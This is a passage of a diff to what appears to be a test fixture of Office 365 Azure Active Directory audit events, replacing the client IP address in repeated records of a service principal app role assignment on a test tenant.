APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -7422,9 +7422,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { 
@@ -7658,7 +7658,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -7688,9 +7688,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T18:26:05",
 "ExtendedProperties": [
 {
@@ -7924,7 +7924,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
